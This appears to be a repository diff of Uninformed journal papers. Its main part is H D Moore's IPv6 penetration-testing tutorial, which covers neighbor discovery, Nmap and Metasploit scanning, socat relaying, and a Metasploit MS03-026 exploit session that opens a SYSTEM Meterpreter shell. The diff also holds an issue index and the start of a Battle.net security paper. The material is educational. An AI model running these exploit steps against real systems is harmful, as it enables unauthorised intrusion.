IPv6-ready. The problem is that few organizations have any intention of
|
||||
implementing IPv6. The result is that most corporate networks contain machines
|
||||
that have IPv6 networking stacks, but have not been intentionally configured
|
||||
with IPv6. The IPv6 stack represents an attack surface that is often
|
||||
overlooked in corporate environments. For example, many firewall products,
|
||||
such as ZoneAlarm on Windows and the standard IPTables on Linux, do not block
|
||||
IPv6 traffic (IPTables can, but it uses Netfilter6 rules instead). The goal of
|
||||
this paper is to demonstrate how existing tools can be used to compromise IPv6
|
||||
enabled systems.
|
||||
|
||||
1.2) Operating System
|
||||
|
||||
All tools described in this paper were launched from an Ubuntu Linux 8.04
|
||||
system. If you are using Microsoft Windows, Mac OS X, BSD, or another Linux
|
||||
distribution, some tools may work differently or not at all.
|
||||
|
||||
1.3) Configuration
|
||||
|
||||
All examples in this paper depend on the host system having a valid IPv6 stack
|
||||
along with a link-local or auto-configured IPv6 address. This requires the
|
||||
IPv6 functionality to be compiled into the kernel or loaded from a kernel
|
||||
module. To determine if your system has an IPv6 address configured for a
|
||||
particular interface, use the ifconfig command:
|
||||
|
||||
# ifconfig eth0 | grep inet6
|
||||
inet6 addr: fe80::0102:03ff:fe04:0506/64 Scope:Link
|
||||
|
||||
1.4) Addressing
|
||||
|
||||
IPv6 addresses consist of 128 bits (16 bytes) and are represented as a groups
|
||||
of four hex digits separated by colons. A set of two colons ("::") indicates
|
||||
that the bits leading up to the next part of the address should be all zero.
|
||||
For example, the IP address for the loopback/localhost consists of 15 NULL
|
||||
bytes followed by one byte set to the value of 0x01. The representation for
|
||||
this address is simply "::1" (IPv4 127.0.0.1). The "any" IPv6 address is
|
||||
represented as "::0" or just "::" (IPv4 0.0.0.0). In the case of link-local
|
||||
addresses, the prefix is always "fe80::" followed by the EUI-64 formatted MAC
|
||||
address, while auto-configured addresses always have the prefix of "2000::".
|
||||
The "::" sequence can only be used once within an IPv6 address (it would be
|
||||
ambiguous otherwise). The following examples demonstrate how the "::" sequence
|
||||
is used.
|
||||
|
||||
0000:0000:0000:0000:0000:0000:0000:0000 == ::, ::0, 0::0, 0:0::0:0
|
||||
0000:0000:0000:0000:0000:0000:0000:0001 == ::1, 0::1, 0:0::0:0001
|
||||
fe80:0000:0000:0000:0000:0000:0000:0060 == fe80::60
|
||||
fe80:0000:0000:0000:0102:0304:0506:0708 == fe80::0102:0304:0506:0708
|
||||
|
||||
1.5) Link-local vs Site-local
|
||||
|
||||
On a given local network, all IPv6 nodes have at least one link-local address
|
||||
(fe80::). During the automatic configuration of IPv6 for a network adapter, a
|
||||
link-local address is chosen, and an IPv6 router discovery request is sent to
|
||||
the all-routers broadcast address. If any IPv6-enabled router responds, the
|
||||
node will also choose a site-local address for that interface (2000::). The
|
||||
router response indicates whether to use DHCPv6 or the EUI-64 algorithm to
|
||||
choose a site-local address. On networks where there are no active IPv6
|
||||
routers, an attacker can reply to the router discovery request and force all
|
||||
local IPv6 nodes to configure a site-local address.
|
||||
|
||||
2) Discovery
|
||||
|
||||
2.1) Scanning
|
||||
|
||||
Unlike the IPv4 address space, it is not feasible to sequentially probe IPv6
|
||||
addresses in order to discover live systems. In real deployments, it is common
|
||||
for each endpoint to receive a 64-bit network range. Inside that range, only
|
||||
one or two active nodes may exist, but the address space is over four
|
||||
billion times the size of the entire IPv4 Internet. Trying to discover live
|
||||
systems with sequential probes within a 64-bit IP range would require at
|
||||
least 18,446,744,073,709,551,616 packets.
|
||||
|
||||
2.2) Management
|
||||
|
||||
In order to manage hosts within large IPv6 network ranges, DNS and other
|
||||
naming services are absolutely required. Administrators may be able to
|
||||
remember an IPv4 address within a subnet, but tracking a 64-bit host ID within
|
||||
a local subnet is a challenge. Because of this requirement, DNS, WINS, and
|
||||
other name services are critical for managing the addresses of IPv6 hosts.
|
||||
Since the focus of this paper is on "accidental" IPv6 networks, we will not be
|
||||
covering IPv6 discovery through host management services.
|
||||
|
||||
2.3) Neighbor Discovery
|
||||
|
||||
The IPv4 ARP protocol goes away in IPv6. Its replacement consists of the
|
||||
ICMPv6 Neighbor Discovery (ND) and ICMPv6 Neighbor Solicitation (NS)
|
||||
protocols. Neighbor Discovery allows an IPv6 host to discover the link-local
|
||||
and auto-configured addresses of all other IPv6 systems on the local network.
|
||||
Neighbor Solicitation is used to determine if a given IPv6 address exists on
|
||||
the local subnet. The linklocal address is guaranteed to be unique per-host,
|
||||
per-link, by picking an address generated by the EUI-64 algorithm. This
|
||||
algorithm uses the network adapter MAC address to generate a unique IPv6
|
||||
address. For example, a system with a hardware MAC of 01:02:03:04:05:06 would
|
||||
use a link-local address of fe80::0102:03FF:FE04:0506. An eight-byte prefix is
|
||||
created by taking the first three bytes of the MAC, appending FF:FE, and then
|
||||
the next three bytes of the MAC. In addition to link-local addresses, IPv6
|
||||
also supports stateless auto-configuration. Stateless auto-configured
|
||||
addresses use the "2000::" prefix. More information about Neighbor Discovery
|
||||
can be found in RFC 2461.
|
||||
|
||||
2.4) The IPv6 Attack Toolkit
|
||||
|
||||
In order to enumerate local hosts using the Neighbor Discovery protocol, we
|
||||
need a tool which can send ICMPv6 probes and listen for responses. The alive6
|
||||
program included with Van Hauser's IPv6 Attack Toolkit is the tool for the
|
||||
job. The example below demonstrates how to use alive6 to discover IPv6 hosts
|
||||
attached to the network on the eth0 interface.
|
||||
|
||||
# alive6 eth0
|
||||
Alive: fe80:0000:0000:0000:xxxx:xxff:fexx:xxxx
|
||||
Alive: fe80:0000:0000:0000:yyyy:yyff:feyy:yyyy
|
||||
Found 2 systems alive
|
||||
|
||||
2.5) Linux Neighbor Discovery Tools
|
||||
|
||||
The 'ip' command, in conjunction with 'ping6', both included with many recent
|
||||
Linux distributions, can also be used to perform local IPv6 node discovery.
|
||||
The following commands demonstrate this method:
|
||||
|
||||
# ping6 -c 3 -I eth0 ff02::1 >/dev/null 2>&1
|
||||
# ip neigh | grep ^fe80
|
||||
fe80::211:43ff:fexx:xxxx dev eth0 lladdr 00:11:43:xx:xx:xx REACHABLE
|
||||
fe80::21e:c9ff:fexx:xxxx dev eth0 lladdr 00:1e:c9:xx:xx:xx REACHABLE
|
||||
fe80::218:8bff:fexx:xxxx dev eth0 lladdr 00:18:8b:xx:xx:xx REACHABLE
|
||||
[...]
|
||||
|
||||
2.6) Local Broadcast Addresses
|
||||
|
||||
IPv6 Neighbor Discovery relies on a set of special broadcast addresses in
|
||||
order to reach all local nodes of a given type. The table below enumerates the
|
||||
most useful of these addresses.
|
||||
|
||||
- FF01::1 = This address reaches all node-local IPv6 nodes
|
||||
- FF02::1 = This address reaches all link-local IPv6 nodes
|
||||
- FF05::1 = This address reaches all site-local IPv6 nodes
|
||||
- FF01::2 = This address reaches all node-local IPv6 routers
|
||||
- FF02::2 = This address reaches all link-local IPv6 routers
|
||||
- FF05::2 = This address reaches all site-local IPv6 routers
|
||||
|
||||
2.7) IPv4 vs IPv6 Broadcasts
|
||||
|
||||
The IPv4 protocol allowed packets destined to network broadcast addresses to
|
||||
be routed across the Internet. While this had some legitimate uses, this
|
||||
feature was abused for years by traffic amplification attacks, which spoofed a
|
||||
query to a broadcast address from a victim in order to saturate the victim's
|
||||
bandwidth with the responses. While some IPv4 services were designed to work
|
||||
with broadcast addresses, this is the exception and not the norm. With the
|
||||
introduction of IPv6, broadcast addresses are no longer routed outside of the
|
||||
local network. This mitigates traffic amplification attacks, but also prevents
|
||||
a host from sending Neighbor Discovery probes into remote networks.
|
||||
|
||||
One of the major differences between IPv4 and IPv6 is how network services
|
||||
which listen on the "any" address (0.0.0.0 / ::0) handle incoming requests
|
||||
destined to the broadcast address. A good example of this is the BIND DNS
|
||||
server. When using IPv4 and listening to 0.0.0.0, DNS requests sent to the
|
||||
network broadcast address are simply ignored. When using IPv6 and listening to
|
||||
::0, DNS requests sent to the link-local all nodes broadcast address (FF02::1)
|
||||
are processed. This allows a local attacker to send a message to all BIND
|
||||
servers on the local network with a single packet. The same technique will
|
||||
work for any other UDP-based service bound to the ::0 address of an
|
||||
IPv6-enabled interface.
|
||||
|
||||
$ dig metasploit.com @FF02::1
|
||||
;; ANSWER SECTION:
|
||||
metasploit.com. 3600 IN A 216.75.15.231
|
||||
;; SERVER: fe80::xxxx:xxxx:xxxx:xxxx%2#53(ff02::1)
|
||||
|
||||
3) Services
|
||||
|
||||
3.1) Using Nmap
|
||||
|
||||
The Nmap port scanner has support for IPv6 targets, however, it can only scan
|
||||
these targets using the native networking libraries and does not have the
|
||||
ability to send raw IPv6 packets. This limits TCP port scans to the
|
||||
"connect()" method, which while effective, is slow against firewalled hosts
|
||||
and requires a full TCP connection to identify each open port. Even with these
|
||||
limitations, Nmap is still the tool of choice for IPv6 port scanning. Older
|
||||
versions of Nmap did not support scanning link-local addresses, due to the
|
||||
requirement of an interface suffix. Trying to scan a link-local address would
|
||||
result in the following error.
|
||||
|
||||
# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx
|
||||
Starting Nmap 4.53 ( http://insecure.org ) at 2008-08-23 14:48 CDT
|
||||
Strange error from connect (22):Invalid argument
|
||||
|
||||
The problem is that link-local addresses are interface specific. In order to
|
||||
talk to to the host at fe80::xxxx:xxxx:xxxx:xxxx, we must indicate which
|
||||
interface it is on as well. The way to do this on the Linux platform is by
|
||||
appending a "%" followed by the interface name to the address. In this case,
|
||||
we would specify "fe80::xxxx:xxxx:xxxx:xxxx%eth0". Recent versions of Nmap
|
||||
(4.68) now support the interface suffix and have no problem scanning
|
||||
link-local IPv6 addresses. Site-local addresses do not require a scope ID
|
||||
suffix, which makes them a little bit easier to use from an attacker's
|
||||
perspective (reverse connect code doesn't need to know the scope ID, just the
|
||||
address).
|
||||
|
||||
# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx%eth0
|
||||
Starting Nmap 4.68 ( http://nmap.org ) at 2008-08-27 13:57 CDT
|
||||
PORT STATE SERVICE
|
||||
22/tcp open ssh
|
||||
|
||||
3.2) Using Metasploit
|
||||
|
||||
The development version of the Metasploit Framework includes a simple TCP port
|
||||
scanner. This module accepts a list of hosts via the RHOSTS parameter and a
|
||||
start and stop port. The Metasploit Framework has full support for IPv6
|
||||
addresses, including the interface suffix. The following example scans ports 1
|
||||
through 10,000 on the target fe80::xxxx:xxxx:xxxx:xxxx connected via interface
|
||||
eth0. This target is a default install of Vista Home Premium.
|
||||
|
||||
# msfconsole
|
||||
msf> use auxiliary/discovery/portscan/tcp
|
||||
msf auxiliary(tcp) > set RHOSTS fe80::xxxx:xxxx:xxxx:xxxx%eth0
|
||||
msf auxiliary(tcp) > set PORTSTART 1
|
||||
msf auxiliary(tcp) > set PORTSTOP 10000
|
||||
msf auxiliary(tcp) > run
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:135
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:445
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1025
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1026
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1027
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1028
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1029
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1040
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:3389
|
||||
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:5357
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
In addition to TCP port scanning, the Metasploit Framework also includes a UDP
|
||||
service detection module. This module sends a series of UDP probes to every
|
||||
host defined by RHOSTS and prints out any responses received. This module
|
||||
works with any IPv6 address, including the broadcast. For example, the session
|
||||
below demonstrates discovery of a local DNS service that is listening on ::0
|
||||
and responds to requests for the link-local all nodes broadcast address.
|
||||
|
||||
# msfconsole
|
||||
msf> use auxiliary/scanner/discovery/sweep_udp
|
||||
msf auxiliary(sweep_udp) > set RHOSTS ff02::1
|
||||
msf auxiliary(sweep_udp) > run
|
||||
[*] Sending 7 probes to ff02:0000:0000:0000:0000:0000:0000:0001 (1 hosts)
|
||||
[*] Discovered DNS on fe80::xxxx:xxxx:xxxx:xxxx%eth0
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
4) Exploits
|
||||
|
||||
4.1) IPv6 Enabled Services
|
||||
|
||||
When conducting a penetration test against an IPv6 enabled system, the first
|
||||
step is to determine what services are accessible over IPv6. In the previous
|
||||
section, we described some of the tools available for doing this, but did not
|
||||
cover the differences between the IPv4 and IPv6 interfaces of the same
|
||||
machine. Consider the Nmap results below, the first set is from scanning the
|
||||
IPv6 interface of a Windows 2003 system, while the second is from scanning the
|
||||
same system's IPv4 address.
|
||||
|
||||
# nmap -6 -p1-10000 -n fe80::24c:44ff:fe4f:1a44%eth0
|
||||
80/tcp open http
|
||||
135/tcp open msrpc
|
||||
445/tcp open microsoft-ds
|
||||
554/tcp open rtsp
|
||||
1025/tcp open NFS-or-IIS
|
||||
1026/tcp open LSA-or-nterm
|
||||
1027/tcp open IIS
|
||||
1030/tcp open iad1
|
||||
1032/tcp open iad3
|
||||
1034/tcp open unknown
|
||||
1035/tcp open unknown
|
||||
1036/tcp open unknown
|
||||
1755/tcp open wms
|
||||
9464/tcp open unknown
|
||||
# nmap -sS -p1-10000 -n 192.168.0.147
|
||||
25/tcp open smtp
|
||||
42/tcp open nameserver
|
||||
53/tcp open domain
|
||||
80/tcp open http
|
||||
110/tcp open pop3
|
||||
135/tcp open msrpc
|
||||
139/tcp open netbios-ssn
|
||||
445/tcp open microsoft-ds
|
||||
554/tcp open rtsp
|
||||
1025/tcp open NFS-or-IIS
|
||||
1026/tcp open LSA-or-nterm
|
||||
1027/tcp open IIS
|
||||
1030/tcp open iad1
|
||||
1032/tcp open iad3
|
||||
1034/tcp open unknown
|
||||
1035/tcp open unknown
|
||||
1036/tcp open unknown
|
||||
1755/tcp open wms
|
||||
3389/tcp open ms-term-serv
|
||||
9464/tcp open unknown
|
||||
|
||||
Of the services provided by IIS, only the web server and streaming media
|
||||
services appear to be IPv6 enabled. The SMTP, POP3, WINS, NetBIOS, and RDP
|
||||
services were all missing from our scan of the IPv6 address. While this does
|
||||
limit the attack surface on the IPv6 interface, the remaining services are
|
||||
still significant in terms of exposure. The SMB port (445) allows access to
|
||||
file shares and remote API calls through DCERPC. All TCP DCERPC services are
|
||||
still available, including the endpoint mapper, which provides us with a list
|
||||
of DCERPC applications on this system. The web server (IIS 6.0) is accessible,
|
||||
along with any applications hosted on this system. The streaming media
|
||||
services RTSP (554) and MMS (1755) provide access to the streaming content and
|
||||
administrative interfaces.
|
||||
|
||||
4.2) IPv6 and Web Browsers
|
||||
|
||||
While most modern web browsers have support for IPv6 addresses within the URL
|
||||
bar, there are complications. For example, with the Windows 2003 system above,
|
||||
we see that port 80 is open. To access this web server with a browser, we use
|
||||
the following URL:
|
||||
|
||||
http://[fe80::24c:44ff:fe4f:1a44%eth0]/
|
||||
|
||||
Unfortunately, while Firefox and Konqueror can process this URL, Internet
|
||||
Explorer (6 and 7) cannot. Since this is a link-local address, DNS is not
|
||||
sufficient, because the local scope ID is not recognized in the URL. An
|
||||
interesting difference between Firefox 3 and Konqueror is how the Host header
|
||||
is created when specifying a IPv6 address and scope ID. With Firefox 3, the
|
||||
entire address, including the local scope ID is sent in the HTTP Host header.
|
||||
This causes IIS 6.0 to return an "invalid hostname" error back to the browser.
|
||||
However, Konqueror will strip the local scope ID from the Host header, which
|
||||
prevents IIS from throwing the error message seen by Firefox.
|
||||
|
||||
4.3) IPv6 and Web Assessments
|
||||
|
||||
One of the challenges with assessing IPv6-enabled systems is making existing
|
||||
security tools work with the IPv6 address format (especially the local scope
|
||||
ID). For example, the Nikto web scanner is an excellent tool for web
|
||||
assessments, but it does not have direct support for IPv6 addresses. While we
|
||||
can add an entry to /etc/hosts for the IPv6 address we want to scan and pass
|
||||
this to Nikto, Nikto is unable to process the scope ID suffix. The solution to
|
||||
this and many other tool compatibility issues is to use a TCPv4 to TCPv6 proxy
|
||||
service. By far, the easiest tool for the job is Socat, which is available as
|
||||
a package on most Linux and BSD distributions. To relay local port 8080 to
|
||||
remote port 80 on a link-local IPv6 address, we use a command like the one
|
||||
below:
|
||||
|
||||
$ socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[fe80::24c:44ff:fe4f:1a44%eth0]:80
|
||||
|
||||
Once Socat is running, we can launch Nikto and many other tools against port
|
||||
8080 on 127.0.0.1.
|
||||
|
||||
$ ./nikto.pl -host 127.0.0.1 -port 8080
|
||||
- Nikto v2.03/2.04
|
||||
---------------------------------------------------------------------------
|
||||
+ Target IP: 127.0.0.1
|
||||
+ Target Hostname: localhost
|
||||
+ Target Port: 8080
|
||||
+ Start Time: 2008-10-01 12:57:18
|
||||
---------------------------------------------------------------------------
|
||||
+ Server: Microsoft-IIS/6.0
|
||||
|
||||
This port forwarding technique works for many other tools and protocols and is
|
||||
a great fall-back when the tool of choice does not support IPv6 natively.
|
||||
|
||||
4.4) Exploiting IPv6 Services
|
||||
|
||||
The Metasploit Framework has native support for IPv6 sockets, including the
|
||||
local scope ID. This allows nearly all of the exploit and auxiliary modules to
|
||||
be used against IPv6 hosts with no modification. In the case of web
|
||||
application exploits, the VHOST parameter can be used to override the Host
|
||||
header sent by the module, avoiding issues like the one described above.
|
||||
|
||||
4.5) IPv6 Enabled Shellcode
|
||||
|
||||
To restrict all exploit activity to the IPv6 protocol, not only do the
|
||||
exploits need support for IPv6, but the payloads as well. IPv6 payload support
|
||||
is available in Metasploit through the use of "stagers". These stagers can be
|
||||
used to chain-load any of the common Windows payloads included with the
|
||||
Metasploit Framework. Once again, link-local addresses make this process a
|
||||
little more complicated. When using the bind_ipv6_tcp stager to open a listening
|
||||
port on the target machine, the RHOST parameter must have the local scope ID
|
||||
appended. By the same token, the reverse_ipv6_tcp stager requires that the LHOST
|
||||
variable have remote machine's interface number appended as a scope ID. This
|
||||
can be tricky, since the attacker rarely knows what interface number a given
|
||||
link-local address corresponds to. For this reason, the bind_ipv6_tcp stager is
|
||||
ultimately more useful for exploiting Windows machines with link-local
|
||||
addresses. The example below demonstrates using the bind_ipv6_tcp stager with
|
||||
the Meterpreter stage. The exploit in this case is MS03-036 (Blaster) and is
|
||||
delivered over the DCERPC endpoint mapper service on port 135.
|
||||
|
||||
msf> use windows/exploit/dcerpc/ms03_026_dcom
|
||||
msf exploit(ms03_026_dcom) > set RHOST fe80::24c:44ff:fe4f:1a44%eth0
|
||||
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
|
||||
msf exploit(ms03_026_dcom) > set LPORT 4444
|
||||
msf exploit(ms03_026_dcom) > exploit
|
||||
[*] Started bind handler
|
||||
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
|
||||
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...]
|
||||
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...][135]
|
||||
[*] Sending exploit ...
|
||||
[*] The DCERPC service did not reply to our request
|
||||
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
|
||||
[*] Sending stage (2650 bytes)
|
||||
[*] Sleeping before handling stage...
|
||||
[*] Uploading DLL (73227 bytes)...
|
||||
[*] Upload completed.
|
||||
[*] Meterpreter session 1 opened
|
||||
msf exploit(ms03_026_dcom) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
|
||||
5) Summary
|
||||
|
||||
5.1) Key Concepts
|
||||
|
||||
Even though most networks are not "IPv6" ready, many of the machines on those
|
||||
networks are. The introduction of a new protocol stack introduces security
|
||||
challenges that are not well-known and often overlooked during security
|
||||
evaluations. The huge address range of IPv6 makes remote discovery of IPv6
|
||||
machines difficult, but local network discovery is still possible using the
|
||||
all-nodes broadcast addresses. Link-local addresses are tied to a specific
|
||||
network link and are only guaranteed unique on that network link where they
|
||||
reside. In order to communicate with an IPv6 node using a link-local address,
|
||||
the user must have knowledge of the local scope ID (interface) for that link.
|
||||
In order for a remote application to connect back to the user over a
|
||||
link-local address, the socket code must specify the local scope ID of the
|
||||
correct interface. UDP services which listen on the IPv6 ANY address (::0)
|
||||
will respond to client requests that are sent to the all-nodes broadcast
|
||||
address (FF02::1), which differs from IPv4. IPv6 broadcast traffic is not
|
||||
routable, which limits many attacks to the local network only. Even though
|
||||
many flavors of Linux, BSD, and Windows now enable IPv6 by default, not all
|
||||
applications support listening on the IPv6 interfaces. Software firewalls
|
||||
often allow IPv6 traffic even when configured to block all IPv4 traffic.
|
||||
Immunity CANVAS, the Metasploit Framework, the Nmap Security Scanner, and many
|
||||
other security tools now support IPv6 targets. It is possible to use a tool
|
||||
written for IPv4 against an IPv6 host by using a socket relay tool such as
|
||||
xinetd or socat.
|
||||
|
||||
5.2) Conclusion
|
||||
|
||||
Although the IPv6 backbone infrastructure continues to grow and an increasing
|
||||
number of client systems and devices support IPv6 out of the box, few ISPs are
|
||||
able to provide routing between the customer site and the backbone. Until this
|
||||
gap is closed, security assessments against IPv6 addresses will be limited to
|
||||
the local network. The lack of awareness about IPv6 in most organizations can
|
||||
provide an easy way for an attacker to bypass network controls and fly under
|
||||
the radar of many security monitoring tools. After all, when confronted with
|
||||
the message below, what is an administrator to do?
|
||||
|
||||
References
|
||||
|
||||
Exploits
|
||||
- THC IPv6 Attack Toolkit - http://freeworld.thc.org/thc-ipv6/
|
||||
- The Metasploit Framework - http://metasploit.com
|
||||
- Immunity CANVAS - http://www.immunitysec.com/
|
||||
Tools
|
||||
- ncat - svn co svn://svn.insecure.org/ncat (login: guest/guest)
|
||||
- socat - http://www.dest-unreach.org/socat/
|
||||
- scapy - http://www.secdev.org/projects/scapy/
|
||||
- nmap - http://nmap.org/
|
||||
- nikto - http://www.cirt.net/nikto2
|
||||
Documentation
|
||||
- RFC 2461 - http://www.ietf.org/rfc/rfc2461.txt
|
||||
- Official IPv6 Site - http://www.ipv6.org/
|
||||
Application Compatibility
|
||||
- http://www.deepspace6.net/docs/ipv6statuspageapps.htm l
|
||||
- http://www.stindustries.net/IPv6/tools.htm l
|
||||
- http://www.ipv6.org/v6-apps.htm l
|
||||
- http://applications.6pack.org/browse/support/
|
24
uninformed/10.txt
Normal file
24
uninformed/10.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
|
||||
|
||||
Engineering in Reverse
|
||||
Can you find me now? Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS
|
||||
Skywing
|
||||
In August 2008 Verizon Wireless released a firmware upgrade for their xv6800 (rebranded HTC Titan) line of Windows Mobile smartphones that provided a number of new features previously unavailable on the device on the initial release firmware. In particular, support for accessing the device's built-in Qualcomm gpsOne assisted GPS chipset was introduced with this update. However, Verizon Wireless elected to attempt to lock down the GPS hardware on xv6800 such that only applications authorized by Verizon Wireless would be able to access the device's built-in GPS hardware and perform location-based functions (such as GPS-assisted navigation). The mechanism used to lock down the GPS hardware is entirely client-side based, however, and as such suffers from fundamental limitations in terms of how effective the lockdown can be in the face of an almost fully user-programmable Windows Mobile-based device. This article outlines the basic philosophy used to prevent unauthorized applications from accessing the GPS hardware and provides a discussion of several of the flaws inherent in the chosen design of the protection mechanism. In addition, several pitfalls relating to debugging and reverse engineering programs on Windows Mobile are also discussed. Finally, several suggested design alterations that would have mitigated some of the flaws in the current GPS lock down system from the perspective of safeguarding the privacy of user location data are also presented.
|
||||
pdf | html | txt
|
||||
|
||||
Using dual-mappings to evade automated unpackers
|
||||
skape
|
||||
Automated unpackers such as Renovo, Saffron, and Pandora's Bochs attempt to dynamically unpack executables by detecting the execution of code from regions of virtual memory that have been written to. While this is an elegant method of detecting dynamic code execution, it is possible to evade these unpackers by dual-mapping physical pages to two distinct virtual address regions where one region is used as an editable mapping and the second region is used as an executable mapping. In this way, the editable mapping is written to during the unpacking process and the executable mapping is used to execute the unpacked code dynamically. This effectively evades automated unpackers which rely on detecting the execution of code from virtual addresses that have been written to.
|
||||
pdf | html | txt
|
||||
|
||||
Exploitation Technology
|
||||
Analyzing local privilege escalations in win32k
|
||||
mxatone
|
||||
This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered.
|
||||
pdf | html | txt
|
||||
|
||||
Exploiting Tomorrow's Internet Today: Penetration testing with IPv6
|
||||
H D Moore
|
||||
This paper illustrates how IPv6-enabled systems with link-local and auto-configured addresses can be compromised using existing security tools. While most of the techniques described can apply to "real" IPv6 networks, the focus of this paper is to target IPv6-enabled systems on the local network.
|
||||
pdf | html | txt
|
||||
|
453
uninformed/2.1.txt
Normal file
453
uninformed/2.1.txt
Normal file
|
@ -0,0 +1,453 @@
|
|||
Inside Blizzard: Battle.net
|
||||
Skywing
|
||||
skywinguninformed@valhallalegends.com
|
||||
Last modified: 8/31/2005
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: This paper intends to describe a variety of the problems Blizzard
|
||||
Entertainment has encountered from a practical standpoint through their
|
||||
implementation of the large-scale online game matchmaking and chat service,
|
||||
Battle.net. The paper provides some background historical information into
|
||||
the design and purpose of Battle.net and continues on to discuss a variety of
|
||||
flaws that have been observed in the implementation of the system. Readers
|
||||
should come away with a better understanding of problems that can be easily
|
||||
introduced in designing a matchmaking/chat system to operate on such a large
|
||||
scale in addition to some of the serious security-related consequences of not
|
||||
performing proper parameter validation of untrusted clients.
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
First, a bit of historical and background information, leading up to the
|
||||
present day. Battle.net is an online matchmaking service that allows players
|
||||
to set up online games with other players. It is quite possibly the oldest
|
||||
and largest system of it's kind currently in existence (launched in 1997).
|
||||
|
||||
The basic services provided by Battle.net are game matchmaking and chat. The
|
||||
matchmaking system allows one to create and join games with little or no prior
|
||||
configuration required (other than picking game parameters, such as a map to
|
||||
play on, or so-forth). The chat system is similar to a stripped-down version
|
||||
of Internet Relay Chat. The primary differences between IRC and Battle.net
|
||||
(for the purposes of the chat system) are that Battle.net only allows a user
|
||||
to be present in one chat channel at once, and many of the channel parameters
|
||||
that IRC users might be familiar with (maximum number of users in the channel,
|
||||
who has channel operator privileges) are fixed to well-defined values by the
|
||||
server.
|
||||
|
||||
Battle.net supports a wide variety of Blizzard games, including Diablo,
|
||||
Starcraft, Warcraft II: Battle.net Edition, Diablo II, and Warcraft III. In
|
||||
addition, there are shareware versions of Diablo and Starcraft that are
|
||||
supported on Battle.net, as well as optional expansions for Diablo II,
|
||||
Starcraft, and Warcraft III. All of these games share a common binary
|
||||
communication protocol that has evolved over the past 8 years, although
|
||||
different games have differing capabilities with respect to the protocol.
|
||||
|
||||
In some cases, this is due to differing requirements for the game clients, but
|
||||
usually this is simply due to the older programs not being updated as
|
||||
frequently as newer versions. In short, there are a number of different
|
||||
dialects of the Battle.net binary protocol that are used by the various
|
||||
supported products, all at the same time. In addition to supporting an
|
||||
undocumented binary protocol, Battle.net has for some time now supported a
|
||||
text-based protocol (the ``Chat Gateway'', as officialy documented). This
|
||||
protocol supports a limited subset of the features available to clients using
|
||||
the full game protocol. In particular, it lacks support for capabilities such
|
||||
as account creation and management.
|
||||
|
||||
Both of these protocols are now fairly well understood and documented certain
|
||||
persons outside of Blizzard. Although the text-based protocol is documented
|
||||
and fairly stable, the limitations inherent in it make it undesirable for many
|
||||
uses. Furthermore, in order to help stem the flood of spam on Battle.net,
|
||||
Blizzard changed their server software to prevent clients using the text-based
|
||||
protocol from entering all but a few pre-defined chat channels. As a result
|
||||
of this, many developers have reverse engineered (or more commonly, used the
|
||||
work of those who came before them) the Battle.net binary protocol and written
|
||||
their own "emulator" clients for various purposes (typically as a better
|
||||
alternative to the limited chat facilities provided by Blizzard's game
|
||||
clients). These clients emulate the behavior of a particular Blizzard game
|
||||
program in order to trick Battle.net into providing the services typically
|
||||
only offered to the game clients, hence the name ``emulator client''. Most of
|
||||
these clients area referred to as ``emulator bots'' or ``emubots'' by their
|
||||
developers, and the Battle.net community in general. In fact, there are also
|
||||
partially compliant server implementations that implement the server-side chat
|
||||
and matchmaking logic supported by Battle.net to varying degrees of accuracy.
|
||||
One can today download a third party server that emulates the Battle.net
|
||||
protocol, and a third party client that emulates a Blizzard client supporting
|
||||
the Battle.net protocol, and have the two inter-operate.
|
||||
|
||||
|
||||
3) Battle.net issues
|
||||
|
||||
By virtue of supporting so many different game clients (at present, there are
|
||||
11 distinct Blizzard-supported programs that connect to Battle.net), Blizzard
|
||||
has a sizable version-control problem. In fact, this problem is compounded by
|
||||
several issues.
|
||||
|
||||
First, many client game patches add or change the protocol in significant
|
||||
ways. For instance, the notion of password-protected, persistent player
|
||||
accounts was not originally even designed into Battle.net, and was added at a
|
||||
later date via a client patch (and server-side modifications).
|
||||
|
||||
On top of that, many clients also have very significant differences in feature
|
||||
support. To give an example, for many years Diablo and Diablo Shareware were
|
||||
both supported on Battle.net concurrently while Diablo supported user accounts
|
||||
and the shareware version did not. As one can imagine, this sort of thing can
|
||||
